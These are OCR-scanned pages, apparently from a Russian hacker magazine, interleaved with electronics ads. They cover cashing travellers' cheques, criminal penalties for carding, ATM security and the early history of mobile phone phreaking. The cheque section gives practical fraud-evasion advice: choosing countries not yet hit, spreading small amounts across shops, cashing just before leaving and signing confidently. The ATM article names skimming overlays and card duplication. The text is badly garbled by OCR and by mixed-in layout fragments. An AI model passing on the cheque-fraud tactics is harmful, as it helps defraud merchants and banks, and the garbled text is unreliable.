что процедура получения денег с чека довольно проста - 
тебе просто надо поставить вторую подпись на чеке ря- 
дом с первой, при работе с чеками в целом существуют 


рами написано 1000, а прописью - десять, то получишь ты Wiraless Optical Desktop 
десять. Наушники/ ek Джойстик/ 2. AGHz* ` 
Sennheiser НО 500-V2 ee ee Logitech Cordless * ` 
ОБНАЛИЧИВАНИЕ ЧЕКА Controller ‘ hes 
и Обычным дорожным чеком можно расплатиться, нап- $779.99 $209.99 $209.99 <. 


свои подводные камни. ой а Педали/СН Рго —Джойстику" CH Flight 
ECE Pedals USB _Sim¥oke USB 

Первое и самое главное: не стоит ездить с фальшивыми ane 

чеками по странам СНГ. Во-первых, это противоречит нег- Заказы по интернету — круглосуточно... ~*~ e-mail: sales@e-shop.ru 

ласному закону "не грабить своих". Во-вторых, так как ты Заказы по телефону можно А с а до а 50 р —пт 

русский, да еще и с чеком, то рассматривать его и подпись ae ОВО Te - 29 

на нем будут чуть ли не под микроскопом. Затем тщатель- `... СУПЕРПРЕДЛОЖЕНИЕ ..-^ стоимость доставки Fe 
“ae ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ снижена на 10%! 


но проверят твои чеки по стоп-листам, и когда твои ноги 
будут уже подкашиваться, скажут, что чек необходимо отп- 
равить на инкассо. Так зачем тебе такие стрессы? Российс- 
ким внутренним органам безразлично, что ты воротишь за 
бугром, но вот в родной стране они баят - поэтому давай 
ознакомимся с правилами поведения за рубежом :). 


Как я говорил, надо знать, в какую страну едешь, чтобы 


взять чек в валюте, которая используется в этой стране У. Я ХОЧУ ПОЛУЧАТЬ БЕСПЛАТН ЫЙ 
Чеки вышеуказанных компаний бывают в долларах, евро, ДА! / КАТАЛОГ PC АКСЕССУАРОВ 


французских сфранках, английских сфунтах и еще некото- » 
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Обычным дорожным чеком можно распла- 
титься, например, в магазине, гостинице, 
ресторане и аругих подобных заведениях 


рых валютах. Сумма на чеке всегда 
кратна 10. Нет чеков, скажем, на 
392,84 доллара. 


Мошенниче- 
ство с чека- 


ми - это ре- 
ально нака- 
зуемое 
преступле- 
ние! 


Когда ты, наконец, выбрал страну, в 
которой будешь сбывать чеки, то дол- 
жен еще и узнать, "девственна" ли 
она. Под словом "девственна" я под- 
разумеваю, что в эту страну с левыми 


чеками особенно никто не лазил. За- 
чем это надо? Объясняю. Если кто-то 
приехал до тебя в эту страну с боль- 
шим количеством чеков, благополуч- 
но их спихнул в банке и радостно уе- 
хал, то в скором времени там поймут, 
что их, хм, слегка обманули. CnegoBa- 
тельно - шумиха вокруг того, что по 
стране ходят фальшивые чеки и 


Обычным 
дорожным 
чеком мож- 
но распла- 
титься в 
магазине, 
гостинице, 
ресторане. 


очень пристальное внимание к турис- 
там с чеками вообще. 


Следовательно, мошенника поймают, 
а значит, посадят. Надо? Нет. Вывод: 
если нальщик приезжает в страну с 
приличной партией чеков, то страна 
должна быть "девственна", если же 
делать несколько заездов, то в тече- 
ние одной - двух недель. Все, больше 
в эту страну ехать нельзя. Кстати, от- 
части и поэтому нельзя работать в 
странах СНГ. Хитрых товарищей с ле- 
выми чеками у нас очень много, и 
стоп-листы висят в банках уже давно. 


Можно поступить и еще грамотнее, 
то есть приехать в страну с _малым_ 
количеством чеков и сбывать их в 
магазинах, сувенирных лавках и в 
других подобных местах. Дело в том, 
что разослать предостережение по 
банкам - это еще куда ни шло. Их в 
стране сравнительно немного. А вот 
если накрывать все магазины, то за- 
дача становится практически невы- 
nonHumon. 


Чеки проворачивают обычно в пос- 
ледние они перед отъездом. Тогда у 
банков не будет времени проверить 
чеки, а у полиции - закрыть границу. 


СОВЕТ НАПОСЛЕДОК 

m Если у тебя в школе была двойка 
по прилежанию, напоминаю - с чеком 
надо обращаться бережно: не мять, 
не пачкать и не писать на нем теле- 
фоны подруг. Ни в коем случае не 
расписываться на нем второй раз за- 
ранее. Делать это надо только при об- 
наличке. Причем ставить свою зако- 
рючку очень бодро и уверенно. Иначе 
продавец может заподозрить нелад- 
ное и отправить чек на проверку. 


Не спеши менять чек, едва сойдя с ав- 
тобуса или трапа самолета, лучше ог- 
лядись повнимательнее. Дело в том, 
что некоторые банки или магазины 
любят большие проценты. Действи- 
тельно, почему бы не поживиться за 
счет наивного туриста? Поэтому луч- 
ше не лениться, а присмотреться, где 
процент пониже. Тем самым ты еще и 
обезопасишь себя от лишних подоз- 
рений, что, мол, зашел в первый же 
попавшийся магазин и меняешь чек 
за любой заоблачный процент. 


Ну и самое последнее. Запомни! Мо- 
шенничество с чеками - это реально 
наказуемое преступление. Вступив в 
игру и проиграв ее, ты можешь хоро- 
шенько схлопотать. Зарабатывай 
деньги честным путем. Лучше синица 
в руке, чем мент в каталажке. 
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«ПРЕСТУПЛЕНИЕ И НАКАЗАНИЕ» ДЛЯ КАРДЕРА 


о: Со 


орошо жить в странах третьего мира, особенно в тех, где бананы растут прямо на улице, а наказания за компь- 
ютерные преступления отсутствуют по определению. У нас же на улицах не растут ни бананы, ни ананасы, за- 
то существуют законы против компьютерных преступлений... Однако это не помешало кардингу стать практически 
национальным видом спорта. 


ем не менее, за свое 


желание разжиться на 


чужих СС-номерах 


...либо арес- 
том на срок 
от 4g06 
месяцев, 
либо лише- 
нием свобо- 


ды на срок 
go 3 лет. 
Скромно, но 
со вкусом, 
т.е. вкус 
камеры ты 
прочувство- 
вать успе- 
ешь. 


Ребят пой- 


мали и 
предъявили 
им обвине- 
ния именно 
по этой 
статье, и 
грозило им 
тогда от 5 
до 10 лет. 


вполне можно полу- 
чить срок. Как говорит- 
ся, любишь кататься, люби и шмотки 
в полоску носить. 


Прежде чем писать эту статью, я по- 
советовался со знакомым судьей и 
проконсультировался у адвоката по 
поводу наказаний, которые можно 
понести за свои проказы. Из этих 
бесед я сделал вывод - срок может 
быть любой, и зависит это от мно- 
гих факторов: адвоката, судьи, 
настроения того и другого и, конеч- 
но же, денег. 


Мне не смогли четко назвать статьи, 
по которым будет вынесен приговор, 
потому что любое мошенничество 
(даже компьютерное) подпадает сра- 
зу под несколько статей УК РФ. 
Прежде чем принимать решение, на- 
ши судьи очень часто обращаются к 
практике подобных дел, и иногда 
именно это бывает решающим сракто- 
ром. И если раньше компьютерных 


преступлений было мало, и судьям 
было трудно выносить вердикт, то 
сейчас накопилось уже достаточно 
случаев, когда подсудимый был отп- 
равлен за решетку. 

Чтобы выяснить, что же может гро- 
зить кардеру, я обратился к реальным 
судебным делам и приговорам, кото- 
рые по ним выносились. Исходя из 
этого, был составлен список статей 
УК РФ и наказаний, которые они пре- 
дусматривают. 


ПОЛУЧЕНИЕ КАРТОЧЕК 

Для получения номеров кредиток 
очень часто используют взломы инет- 
магазинов и других on-line служб, со- 
держащих базу кредитных карт. А лю- 
бой взлом по нашим законам - это ст. 
272 УК РФ: "Неправомерный доступ к 
компьютерной информации". И грозит 
такой взлом штрасфом в размере от 
200 go 500 минимальных размеров 
оплаты труда или в размере заработ- 
ной платы или иного дохода за пери- 
og oT 2 go 5 месяцев, либо исправи- 
тельными работами на срок от 6 меся- 
цев go 1 года, либо лишением свобо- 
ды на срок до 2 лет. 
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То же самое, HO при совершении KO- 
мандой по предварительному сговору 
или с использованием служебного 
положения, карается штрасром в раз- 
мере от 500 до 800 минимальных 
размеров оплаты труда или в размере 
заработной платы или иного дохода 
за период от 5 до 8 месяцев, либо 
исправительными работами на срок 
oT 1 года go 2 лет, либо арестом на 
срок от 3 до 6 месяцев, либо лишени- 
ем свободы на срок go 5 лет. 

Вот тут уже стоит задуматься, рабо- 
тать в одиночку и загреметь на 2 года 
или командой с залетом на 5 лет. 


ИЗГОТОВЛЕНИЕ ИЛИ СБЫТ 

Кардер получил доступ к кредитке 
и решил ее сбыть. Это уже другая 
статья, а именно ст. 187 УК РФ: "Изго- 
товление или сбыт поддельных кре- 
дитных либо расчетных карт и иных 
платежных документов, не являющих- 
ся ценными бумагами". Тут можно 
рассчитывать на лишение свободы на 
срок OT 2 gO 6 лет со штрадром в раз- 
мере от 500 go 700 минимальных 
размеров оплаты труда или в размере 
заработной платы или иного дохода 
за период от 5 go 7 месяцев. Как ви- 
дишь, даже при действиях в одиночку 
наказание будет довольно суровым. 
Те же нарушения, совершенные неод- 
нократно или командой, приведут к 
лишению свободы на срок от 4 go 7 
лет с конфискацией имущества. То 
есть придет пара Робин Гудов, и забе- 
рут они комп в пользу нашего бедно- 
го государства :). 


МОШЕННИЧЕСТВО 
Если ты что-то приобрел по воро- 
ванной кредитке, тебе могут припи- 


сать статью 159 
УКРФ - "Мо- 
шенничество", 
то есть "хище- 
ние чужого иму- 
щества или при- 
обретение пра- 
ва на чужое 
имущество пу- 


. 


<=) 


a 


тем обмана или 

злоупотребле- 
Их разыскивает ния доверием". 
полиция: Вапе. Это грозит 
Такую мадам штрафом в раз- 
наверняка мере от 200 go 


700 минималь- 
ных размеров 
оплаты труда 
или в размере 
заработной платы или иного дохода 
за период от 2 до 7 месяцев, либо 
обязательными работами на срок от 
180 до 240 часов, либо исправитель- 
ными работами на срок от 1 года go 2 
лет, либо арестом на срок от 4 go 6 
месяцев, либо лишением свободы на 
срок до 3 лет. Скромно, но со вкусом, 
т.е. вкус камеры ты прочувствовать 
успеешь. 


разыскивают не 
только за взлом ;) 


То же самое, но 
совершенное 
командой по 
предваритель- 
ному сговору 
неоднократно, с 
причинением 
значительного 
ущерба гражда- 
нину, наказыва- 
ется штрафом в 
размере от 700 
go 1000 мини- 
мальных разме- 
ров оплаты труда или в размере зара- 
ботной платы или иного дохода за пе- 
риод от 7 месяцев до 1 года, либо ли- 
шением свободы на срок от 2 до 6 лет 
со штрафом в размере до 50 мини- 
мальных размеров оплаты труда или 
в размере заработной платы или ино- 
го дохода за период до 1 месяца либо 
без такового. 


Их разыскивает 
полиция: Rockstar 


И самая страшная часть этой статьи - 
когда преступление совершается ко- 
мандой, в крупном размере, лицом, 
ранее два или 
более раз суди- 
мым за хищение 
либо вымога- 
тельство. Здесь 
светит лишение 
свободы на срок 
oT 5 go 10 лет, в 
лучшем случае 
без конфиска- 
ции железа. В 
худшем, мо- 
жешь ожидать 
все тех же Ро- 
бин Гудов, кото- 
рые отбирают у 
бедных студен- 


Их разыскивает 


полиция: Hexeir. 
Что может 
указывать на то, 
что это хакер? Да 
надпись на майке! 
А ты уже заказал 
себе такую? :) 


тов компьютеры и отдают их еще бо- 
лее бедному государству. 


В ноябре 2001 года поймали ребят, 
пытавшихся через интернет-магазин 
"Топмэн" купить товары на крупную 
сумму. Им предъявили обвинение 
именно по этой статье, и грозило им 
тогда от 5 go 10 лет. 


КРАЖА, ОНА 
ИВ АФРИКЕ КРАЖА 

m Когда ты достаешь кредитки, ты 
не просто взламываешь компьютер- 
ную систему, а воруешь номера Kpeg. 
А это уже статья 158 "Кража, то есть 
тайное хищение чужого имущества". 
Это грозит штрафом в размере от 200 
go 700 минимальных размеров опла- 
ты труда или в 
размере зара- 
ботной платы 
или иного goxo- 
да за период от 
2 gO 7 месяцев, 
либо обязатель- 
ными работами 
на срок от 180 
go 240 часов, 
либо исправи- 
тельными рабо- 
тами на срок OT 1 
года до 2 лет, 
либо арестом на 
срок от 4 go 6 
месяцев, либо 
лишением сво- 
бобы на срок go 
3 лет. 


Их разыскивает 
полиция: Cain. 
Такой фейс 
сложно не узнать, 
так что парню 
лучше не 
появляться на 
улице 


Если кража совершена группой лиц, 
то наказанием будет штраф в разме- 
ре от 700 go 1000 минимальных раз- 
меров оплаты труда или в размере за- 
работной платы или иного дохода за 
период от 7 месяцев до 1 года, либо 
лишение свободы на срок OT 2 go 6 
лет со штрасфом в размере до 50 ми- 
нимальных размеров оплаты труда. 


РОДИНА МОЯ - БЕЛОРУССИЯ 

и Любой кардер должен вызубрить 
статью 159 УК РФ. Если взлом и кра- 
жу кредитных карт доказать сложно, 
то при обналичивании или отоварива- 
нии кред тебя вычислят без проблем, 
и этого хватит, чтобы припаять тебе 
oT 5 go 10 лет. 
В Benopyccuu в этом отношении слож- 
нее, потому что по их законам за хи- 
щение, совершенное при помощи 
компьютерной техники, грозит наказа- 
ние до 15 лет лишения свободы. Прав- 
да, никто пока такого срока вроде не 
получал, но факт остается срактом. В 
прошлом году два кардера, Алексей 
Макеев и Виктор Палазник, получили 
2 и4 года соответственно. 


СОБСТВЕННЫЙ ОПЫТ 

m Мне однажды удалось пообщать- 
ся с управлением "Р", так как на меня 
прислали запрос из Интерпола. Когда 
ко мне приходили, меня не было дома. 


Я точно не знал, зачем меня вызыва- 
ют, поэтому смело шел в городское 
управление. Я никогда не нарушал за- 
кон, и мне нечего было бояться. Но 
уже через пять минут общения со 
следователем я понял, что, на самом 
деле, бояться мне есть чего :). 

Меня обвиняли в том, чего я не делал, 
и доказывать свою невиновность мне 
пришлось трем товарищам, которые 
даже не знали, как изменить старто- 
вую страницу в IE. Хорошо, что ребята 
оказались профессионалами в своем 
деле и носят погоны не зря. Я все 
объяснил, меня внимательно выслу- 
шали, и сотрудники Управления "Р" 
смогли за час выяснить, что меня 
просто подставили. Я считаю, что мне 
просто повезло. Если верить слухам, 
иногда попадаются такие мордоворо- 
ты, что могут запросто засадить в КПЗ 
до полного решения дела. 

Интерпол - это 
не шутки, а за 
кардинг запрос 
придет именно 
оттуда. Так что 
десять раз поду- 
май, прежде чем 
шутить с зако- 
ном. Один раз 
повезет, на вто- 
рой привык- 
нешь, на третий 
сядешь. И это - 
жестокая реаль- 
НОСТЬ. 


Их разыскивает 
полиция: Jinx 


итого 

m На мой взгляд, кардинг наказыва- 
ется довольно жестоко. Именно поэто- 
му мы часто слышим в новостях, что 
какой-то кардер пойман и ему светит 
сотня-другая лет тюрьмы. Конечно же, 
такое суровое наказание не вынесет 
ни один судья, потому что кардеры - в 
основном молодые ребята, и ломать 
жизнь талантли- 
вой молодежи 
никто не будет. Но 
похлебать тюрем- 
ные харчи ты в 
любом случае ус- 
пеешь и поймешь, 
что на мир можно 
смотреть не толь- 
ко через светя- 
щийся монитор, 
но и через сталь- 
ную решетку. 


Прежде чем искать приключения, де- 
сять раз подумай, а стоит ли? Может, 
лучше честно погорбатиться за 
компьютером, чем провести несколь- 
ко лет жизни с лопатой в руках, бесп- 
латно работая на государство? 


Но тюрем- 
ные харчи 
ты похле- 
бать в лю- 
бом случае 
успеешь и 
поймешь, 
что на мир 
можно 
смотреть не 
только че- 
рез светя- 
щийся мо- 
нитор, HO и 
через 
стальную 
решетку. 
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ОХОТА НА БАНКОМАТЫ | 


Каролик Андрей (andrusha@sl.ru) 


ОХОТА НА 
БАНКОМАТЫ 


ПО ЗУБАМ ЛИ ТЕБЕ ИХ ЗАЩИТА? 


у кто не пользовался банкоматом. Подошел, сунул, получил. Все настолько просто, что даже ребенку понятно. 
Однако будоражит вопрос, а можно ли железную машину обмануть. Смотришь «Терминатора» и кажется, что все 
элементарно. Так ли это на самом деле? 


казывается, все не так 


просто. Умные дяди 


постарались защитить 


ящик с деньгами от по- 


Оказывает- 
ся, все не 
так просто. 
Умные дяди 
постарались 
защитить 
ящик с 
деньгами от 
посяга- 
тельств. В 
итоге взла- 
мывать за- 
щиту себе 
дороже. 


С развитием 
публичных 
сетей и по- 


явлением 
множества 
неохраняе- 
мых банко- 
матов на 
улицах 
проблема 
визуальной 
защиты 
стала более 
актуальной. 


Основная 


задумка - 
интегриро- 
вать систе- 
му распоз- 
навания 
лиц. Разра- 
ботки по- 
добных сис- 
тем ведутся 
давно, но 
первенцы 
были мало- 
эффектив- 
ны. 


сягательств. В итоге 


взламывать защиту себе дороже. И 
тут вундеркинды не растерялись, со- 
образив, что можно непосредственно 
подглядеть пин-код, сделав потом му- 
ляж карточки. С внедрением визуаль- 
ной защиты и это стало далеко небе- 
зопасным. Я решил выяснить, как же 
устроена защита банкоматов, что на- 
зывается, из первых рук. 


ВИЗУАЛЬНАЯ ЗАЩИТА 
Визуальная защита банкоматов, 
по словам начальника отдела продаж 
компании ISS (www.iss.ru), Менделева 
Алексея Николаевича, сейчас наибо- 
лее актуальна и востребована. Рань- 
ше этому вопросу уделяли гораздо 
меньше внимания. Во-первых, почти 
все банковские сети были корпора- 
тивными (доступ был строго ограни- 
чен) или хорошо охранялись. Поэтому 
необходимость в дополнительном 
дистанционном наблюдении автома- 
тически отпадала. Во-вторых, исполь- 
зуемый протокол передачи данных 
Х.25 - очень "узкий", максимальная 
скорость передачи данных не более 8 
Кбит. Для передачи текстовой инфор- 
мации этого вполне хватало (тексто- 
вое сообщение при транзакциях 
обычно не превышает 300-400 зна- 
ков), а вот передавать видео было 
просто нереально. Мало того, что ви- 
део "не пролезет" само, так еще и 
забьет передаваемую параллельно 
финансовую информацию. 


С развитием публичных сетей и появ- 
лением множества неохраняемых бан- 
коматов на улицах проблема визуаль- 
ной защиты стала более актуальной. 
Частыми были не столько попытки 
взлома, сколько вандализм и жела- 
ние вывести девайс из строя без вся- 
кого смысла. Сперва ограничились 
только датчиками: на удар и темпера- 
турный. Первый, соответственно, сра- 
батывал при значительных вибраци- 
ях, а второй - на повышение темпера- 
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туры. Сам банкомат не вибрирует по 
определению :), поэтому срабатыва- 
ние датчика на удар свидетельствова- 
ло об откровенном вмешательстве 
извне. Поступал сигнал от датчика, 
выезжала оперативная группа, а раз- 
бирались уже на месте. Температур- 
ный датчик страховал на случай по- 
жара. Тем более что банкомат - это, по 
сути, большой сейф, который плохо 
вентилируется, чтобы ограничиться 
от внешних атмосферных воздей- 
ствий (считай, как консервная банка). 


Дополнительно ставятся специфичес- 
кие датчики. К примеру, есть понятие 
"открытие сейфа под принуждением", 
когда охранник открывает сей бан- 
комата под дулом пистолета. Причем в 
этом случае не спасет и дистанцион- 
ное визуальное наблюдение, если гра- 
битель угрожает пистолетом из-за уг- 
ла. Тут и приходит на помощь неза- 
метный, но эфорективный датчик, опо- 
вещающий об открытии сейфра. Если 
подтверждение об открытии от охран- 
ника не поступает, принимаются меры. 


ш В Европе было время, когда банкоматы вырывали буквально 
экскаваторами и прочими механическими приспособлениями, наде- 
ясь на легкую наживу. Практически все случаи заканчивались 
арестом на месте, остальных ловили по пути домой с выдранным 
сейфом. Был подобный случай и в России. Подогнали машину и в 
тупую выдрали банкомат из стены. Грабителей задержали благода- 
ря пересланным jpg изображениям, на которых были видны номера 
машины и лицо одного из грабителей. 


Ш Смысл уличных банкоматов - аппаратура, которая обрабатывает 
и пересылает видеопоток от внешних камер - находится отдельно 
от банкомата. Либо в отделении банка, рядом с которым стоит бан- 
комат, либо в специальном помещении, которое охраняется отдель- 
но и проникнуть туда весьма затруднительно. То есть "захватила" 
тебя камера - можешь писать завещание. Когда преступников тор- 
мознули на выезде из города, они были приятно удивлены :). 


Но выезжать на любой сильный пи- 
нок по банкомату - напряжно, а ставить 
к каждому банкомату по охраннику - не 
выход. Тогда всерьез задумались о 
дистанционном визуальном наблюде- 
нии. Плюс были нередки случаи, когда 
сынишка тырил у папы карточку, топал 
к банкомату и снимал наличность. Сис- 
тема никакого криминала не отслежи- 
вала, так как пин-код введен, деньги 
сняты, все в норме. Потом шалопай ак- 
куратно подкладывал карточку обрат- 
но, как будто все так и было :). Папа, 
спустя какое-то время, обнаруживает 
убыток на счету и заявляет, что деньги 
не снимал. В случае изготовления и ис- 
пользования муляжа чужой карточки 
ситуация полностью аналогична. День- 
ги снимаются корректно, но не вла- 
дельцем :). Наличие видеоархива поз- 
волило разрешать подобные спорные 
ситуации. Было достаточно связать во 
времени архив по транзакциям с архи- 
вом видео, чтобы понять, кто именно 
снял или положил деньги. 


РЕАЛИЗАЦИЯ 

и Тем временем появилось множе- 
ство передовых технологий сжатия 
видеоинформации, но любой кодек из 
сегодня существующих не даст сжа- 
тие более 0,5 Кб на кадр. Выходов 


нашлось два. Первый - прокладка от- 
дельного (параллельного) канала 
(вплоть gO оптоволокна), по которому 
гонится только видео, отображающее 
все, что происходит в реальном време- 
ни. Но это не всегда возможно, к тому 
же накладно. Поэтому второй выход - 
передача отдельных кадров (сфрей- 
мов) по протоколу Х.25, с наложением 
их на информацию о транзакции. 


Картинки привязаны к отдельным со- 
бытиям: подошел, вставил (карточку), 
дата, ФИО владельца, мордашка того, 
кто юзает карточку, и т.п. При этом 
ставятся две камеры: одна смотрит на 
лицо, а вторая - на руки в момент вы- 
дачи денег (ввод пин-кода камера не 
захватывает). Далее картинки переда- 


ются на контрольный пункт, позволяя » 


Срабатыва- 
ние датчика 
на удар 
свидетель- 
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откровен- 
ном вмеша- 
тельстве 
извне. Пос- 
тупал сиг- 
нал от дат- 
чика, выез- 
жала опера- 
тивная 
группа, а 
разбирались 
уже на мес- 
те. 


редки слу- 
чаи, когда 
сынишка 
тырил у па- 
пы карточ- 
ку, топал к 
банкомату и 
снимал на- 
личность. 


Одно из ре- 
шений - пе- 


редача от- 
дельных 
кадров 
(фреймов) 
по протоко- 
лу Х.25, с 
наложением 
их на ин- 
формацию о 
транзакции. 


Теоретичес- 
ки, конечно, 
возможно 
взять бан- 
комат, пе- 
ретащить в 
укромное 
место, 
подключить 
к псевдо- 
хосту и по- 
дать коман- 
ду на выда- 
чу денег. 


Данные 
можно дос- 
тать, подк- 
лючившись 
на прослу- 
шивание. 
Для этого 
придется на 
ридер бан- 
комата при- 
делать нак- 
ладку, что- 
бы считы- 
вать трек-2. 
карты. 


Ключи, с 
помощью 
которых 
происходит 
криптова- 
ние, в отк- 
рытом виде 
не живут, 
известны 
только бан- 
комату и 
хосту, меж- 
ду которы- 
ми идет об- 
мен. 


ТЕОРИЯ 


ОХОТА НА БАНКОМАТ] 


ы | 


отслеживать работу банкомата в ре- 
альном времени. Получается своеоб- 
разный протокол событий с картинка- 
ми, позволяющий объединить финан- 
совую информацию с визуальной. Не- 
кий единый источник информации, из 
которого сразу понятно, как происхо- 
дило, кто виноват и что делать. Те- 
перь при срабатывании датчиков 
можно оценить, надо ехать или это 
ложная тревога. 


Есть возможность конфигурировать 
систему, отправляя картинки, скажем, 
за минуту до события и через минуту 
после события. Либо осуществлять 
"горячую запись" - картинки во время 
транзакции делаются через onpege- 
ленный промежуток времени, к при- 
меру, через каждые 15 секунд. 


Помимо картинок реальное видео все 
равно пишется, но на локальный 
жесткий диск банкомата, который так- 
же располагается внутри сейсра. При 
необходимости его можно забрать и 
восстановить полную картину проис- 
ходящего, используя ранее получен- 
ные кадры в качестве ключевых для 
поиска необходимых временных от- 
резков. Данные все в цифре, так что 
поиск происходит практически мгно- 
венно. Сам винчестер достаточно ем- 
кий и способен писать видеоинфор- 
мацию go 45 (!) суток (непрерывно). 


ПЕРСПЕКТИВЫ 

Алексей Николаевич охотно по- 
делился планами в области визуаль- 
ной защиты банкоматов. Основная 
задумка - интегрировать систему 


“ue! 


Place 
een epee 


распознавания лиц. Разработки по- 
добных систем ведутся давно, но 
первенцы были малоэфофективны. 
Смысл в том, чтобы подключить все 
банкоматы к одной базе данных и 
синхронизировать. Если на каком-ли- 
бо банкомате появится подозритель- 
ная личность, то автоматически бу- 
дут фиксироваться повторные появ- 
ления подозреваемого у этого банко- 
мата и похождения по другим, а при 
необходимости блокироваться дос- 
туп ко всем банкоматам. Другими 
словами, система поможет подстра- 
ховаться от повторных попыток 


взлома и повысить эффективность 
визуальной защиты в целом. 


ЗАЩИЩЕННОСТЬ ТЕХНОЛОГИИ 

"Ничего особенного нет, те же ка- 
налы связи, те же самые методы за- 
щиты, - прокомментировал мой воп- 
рос о защищенности сетей банкома- 
тов начальник отдела программных 
разработок компании ЛАНИТ 
(www.lanit.ru) Каритич Алексей Вален- 
тиновиЧч. - Другое дело, что у платеж- 
ных систем есть свои средства защи- 
ты по умолчанию, которые заложены 
непосредственно в технологию - крип- 
тозащита пин-блока и проверка под- 
писи сообщения на подлинность (со- 
общение открытое, но вычисляется 
некий код, чтобы определить валид- 
ность сообщения)". 


Теоретически, конечно, возможно 
взять банкомат, перетащить в укром- 
ное место, подключить к псевдохосту 
и подать команду на выдачу денег. Ho 
нужен псеводохост и большой карман, 
чтобы незаметно унести банкомат :). А 
чтобы подстроить интерфейс NceBgo- 
хоста так, чтобы он корректно выда- 
вал себя за реальный хост (система 
управления банкоматом), необходимо 
знать все ключи, которыми криптуют- 
ся сообщения между реальным хос- 
том и данным банкоматом. 
Вклиниться в сам канал, не трогая 
банкомат, теоретически тоже реально. 
Только на практике кабель не валяет- 
ся на полу, и мест для подключения 
нет, либо тебя быстро засекут. А обо- 
рудование для подключения обойдет- 


ся дороже, чем ты выкачаешь денег из банкомата. Проще nogge- 

лать карточку (дубликат) - основная угроза банкоматам сейчас. 

Но чтобы сделать муляж карточки, необходимы данные и пин-код. MDM КИ | (0) 
Пин-код элементарно подсматривают. Поэтому в последнее время | 

в заставках на банкоматах пишут что-то вроде "Враг подслушива- 

ет, подсматривает - посмотри по сторонам, закрой пин руками!" 

Данные можно достать, подключившись на прослушивание. Для 

этого придется на ридер банкомата приделать накладку, чтобы 


считывать трек-2 карты, что опять же практически неосуществимо 
- тебя засекут раньше, чем ты закончишь. 


КРИПТОЗАЩИТА 

Алексей Валентинович рассказал, как защищается передавае- 
мая информация (включая пин-код) между банкоматом и цент- 
ральной банковской сетью. Криптуется только пин-код. Криптова- 
ние реализуется по симметричной схеме с закрытым ключом (DES- 
алгоритм, ). Раньше этого было goc- 
таточно, но сейчас мощности возросли, и вскрывать подобное 
криптование стало проще. Тогда стали использовать Triple DES- 
алгоритм - по сути, это криптование тем же РЕ$-алгоритмом, но 
последовательно 3 раза. Стойкость к вскрытию, соответственно, 
увеличилась на 3 порядка. Пока этого более чем достаточно. Воз- 
можно, со временем и этого алгоритма будет недостаточно - при- 
думают что-нибудь еще. 


А вот остальные сообщения терминального оборудования, сопут- 
ствующие транзакциям, криптовать смысла не было, так как они 
несут в себе только служебную информацию. То есть вся инфор- 
мация, за исключением пин-кода, "бегает" по каналам в доступ- 
ном gna чтения виде. Но проверяется некая контрольная сумма, 
которая вычисляется с помощью секретных ключей по тому же 
DES-anroputmy. Это позволяет проверять все сообщения на досто- 
верность, чтобы избежать возможных ошибок при передаче и 
вклинивания в систему злоумышленников извне. 


Ключи, с помощью которых происходит криптование, в открытом 
виде не живут, известны только банкомату и хосту, между которы- 
ми идет обмен. Мало того, что у каждого банкомата свои ключи, 
они еще и постоянно меняются (периодичность может быть лю- 
бой). Долго живет только мастер-ключ хоста, которым криптуются 
все остальные ключи связанных с этим хостом банкоматов. 


БУДУЩЕЕ 

Перспективы Алексей Валентинович охарактеризовал так: 
"Особо нового и революционного ничего не будет. Усложняются 
криптоалгоритмы, и требуется все больше и больше ресурсов, как 
для защиты, так и для взлома". Основной недостаток, который 
сейчас существует, заключается в открытости сообщений. Все-та- 
ки есть вероятность подключения извне и использования этой 
информации в своих целях. Вскрыть счета с ее помощью не 


удастся, но почерпнуть какие-то сведения о пользователях и сум- 
мах реально. Поэтому сейчас начинают криптовать весь трафик 
(включая и сообщения, а не только пин-код), в скором будущем 


так будут защищены все каналы. 
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КАК ЛОМАЛИ МОБИЛЬНЫЕ ТЕЛЕФОНЫ: С 1990-Х ДО НАШИХ ДНЕЙ 


А НАРОД ХОТЕЛ 


m Народ хотел ge- 


шевле, а операторы не 


Это выпу- 
скники МИ- 
ФИ, МВТУ 
имени Бау- 
мана и дру- 
гих сильных 
вузов, где 
программи- 
рование, 
высшая ма- 
тематика и 
радиоэлект- 
роника сто- 
ят не на 
последних 
местах в 
списке изу- 
чаемых дис- 
циплин. 


В мае 2002 
года в рос- 
сийских 
СМИ появи- 
лось заяв- 
ление о 
том, что 
специалис- 
ты из ком- 
пании IBM 
смогли 
взломать 
код SIM- 
карты с по- 
мощью 
только об- 
щедоступ- 
ных элект- 
ронных 
приборов за 
несколько 
минут. 


снижали цены в силу 
многих причин - за что и расплачива- 
лись в буквальном смысле. Именно в 
то время начали появляться так назы- 
ваемые фрикеры - телесронные пира- 
ты. Многие думают, что если сосед дя- 
дя Вася с седьмого этажа поменял 
прошивку на своем сотовом телефо- 
не, то он автоматически стал фрике- 
ром. Нет. Настоящие фрикеры были 
специалистами своего дела - в то Bpe- 
мя их было очень мало, а сейчас прак- 
тически нет. Это выпускники МИФИ, 
МВТУ имени Баумана и других силь- 
ных вузов, где программирование, 
высшая математика и радиоэлектро- 
ника стоят не на последних местах в 
списке изучаемых дисциплин. Они де- 
лали связь бесплатной, чем привле- 
кали внимание общественности и со- 
ответствующих силовых структур. 
Именно тогда было создано небезыз- 
вестное Управление "P", занимающе- 
еся преступлениями в сфере высоких 
технологий. Сейчас такие ‹дфрикеры не 
востребованы, потому что их работа 
не окупается, а в начале девяностых 
они легко зарабатывали в день сумму 
с четырьмя нулями и далеко не рос- 
сийских рублей. Именно те девянос- 
тые ознаменовались спадом российс- 
кой экономики, тогда деньги валялись 
на земле - их нужно было только под- 
нять, и фрикеры поднимали. 


ОТПУСТИТЕ МЕНЯ В ГИМАЛАИ 
m Все начиналось с пресловутых те- 
лефонов "Алтай", с которых звонили 
родственникам в Америку. Причем 
бесплатно и много, за счет людей, к 
которым нелегально подключались. 
Потом все перешло на сотовые. С ни- 
ми, однако, все сложнее - ведь в мо- 
бильном телефоне есть 5!М-карта, ко- 
торую определяет базовая станция и 
регистрирует в сети по ее номеру - а 
не по номеру сотового. Безусловно, я 
имею в виду стандарт GSM. Этот но- 
мер и вся другая важная информация 
(PIN, PUK и пр.) закодирована Ha SIM- 
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карте 128-битовым ключом. Самая 
большая проблема была в том, чтобы 
подобрать этот ужасно-много-бито- 
вый ключ. Сделать это в домашних ус- 
ловиях можно только банальным пе- 
ребором. И именно этим занимались 
настоящие фрикеры. Но об этом чуть 
позже, а пока я расскажу тебе необ- 
ходимый минимум теории. 


Вообще, вся зона охвата территории 
оператором делится на относительно 
маленькие соты (их диаметр - в Cpeg- 
нем 5 километров). В городе, как пра- 
вило, это расстояние - метров 600, за 
